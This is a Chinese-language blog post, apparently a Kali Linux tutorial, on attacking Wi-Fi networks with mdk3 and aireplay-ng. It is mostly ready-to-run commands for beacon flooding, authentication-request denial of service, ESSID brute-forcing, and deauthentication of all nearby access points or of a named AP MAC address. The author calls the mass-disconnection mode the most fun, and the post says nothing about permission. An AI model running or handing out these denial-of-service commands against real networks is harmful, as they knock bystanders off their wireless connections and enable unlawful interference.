Kali无线渗透测试-aircrack/mdk3


MDK3

MDK3是一款无线攻击测试工具,能够发起BeaconFlood,AuthenticationDoS,Deauthentication/Disassociation Amok等模式的攻击 另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能。

首先激活无线网卡至监听模式

airmon-ng start wlan0

然后输入

mdk3 --fullhelp

查看详细帮助内容

攻击命令为:

mdk3 <mon0> <参数>

mon0为监听模式的无线网卡,具体使用ifconfig查看


beacon flood mode

发射大量死亡ssid来干扰其他使用者

使用

mdk3 --help b  #查看详细内容
 -n <ssid>               #自定义ESSID
 -f <filename>           #读取ESSID列表文件
 -v <filename>           #自定义ESSID和BSSID对应列表文件
 -d                     #自定义为Ad-Hoc模式
 -w                      #自定义为wep模式
 -g                      #54Mbit模式
 -t                      # WPA TKIP encryption
 -a                      # WPA AES encryption
 -m                      #读取数据库的mac地址
 -c <chan>               #自定义信道
 -s <pps>                #发包速率

使用样例

mdk3 mon0 b -f /root/list.txt -c 6 -s 100

Authentication DoS

验证请求攻击模式:自动模拟随机产生的mac向目标AP发起大量验证请求,导致AP忙于处理过多的请求而停止对正常连接客户端的响应,迫使AP主人重启路由。(对于新型路由器效果不明显)

mdk3 --help a  #查看详细内容
 -a <ap_mac>              #测试指定BSSID
 -m                     #使用有效数据库中的客户端mac地址
 -c                    #对应 -a ,不检查是否测试成功
 -i  <ap_mac>           #对指定BSSID进行智能攻击
 -s <pps>               #速率,默认50

使用样例

mdk3 mon0 a -a xx:xx:xx:xx:xx:xx -c -s 100

Deauthentication/Disassociation Amok

强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击,可以造成一定范围内的无线网络瘫痪. //这是最好玩的模式

mdk3 --help d #查看详细内容
 -w <filename>                  #白名单mac地址列表文件
 -b <filename>                  #黑名单mac地址列表文件
 -s <pps>                       #速率
 -c [chan,chan,chan,...]        #信道,可以多填,如 1,6,11

使用样例

mdk3 mon0 d -s 200 -c 1,6,11

除了MDK3以外,aireplay-ng也能够实现Deauth攻击

-0的意思为采用Deauth攻击(使用-deauth同理) 后跟的参数为发送Deauth包的数量; -a后的参数为目标AP的MAC地址

具体使用方法可用

aireplay-ng –help

查看

aireplay-ng --deauth 50 -a A8:57:4E:B5:2E:8A wlan0mon

注意:aireplay-ng 进行攻击如上时,只会在wlan0mon监听的信道内寻找目标,所以在进行攻击前,应先用

airodump-ng wlan0mon

寻找目标mac与信道,然后将网卡监听信道调整到目标mac所在信道,

airmon-ng start wlan0 X(代表目标信道) 

再执行攻击命令,否则会出现No such BSSID available


Basic probing and ESSID Bruteforce mode

探测AP基本信息和ESSID猜解

mdk3 --help p #查看详细信息
-e <ssid>             #待检测的ssid
-f <filename>          #检测AP设置为隐藏的ssid列表文件
-t <bssid>               #用bssid检测AP的信息
-s <pps>                 #速率,默认300
-b <character set>         #设置字符集

使用样例

mdk3 mon0 p -t xx:xx:xx:xx:xx:xx -s 100

文章作者: sfc9982
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC-ND 4.0 许可协议。转载请注明来源 sfc9982 !
  目录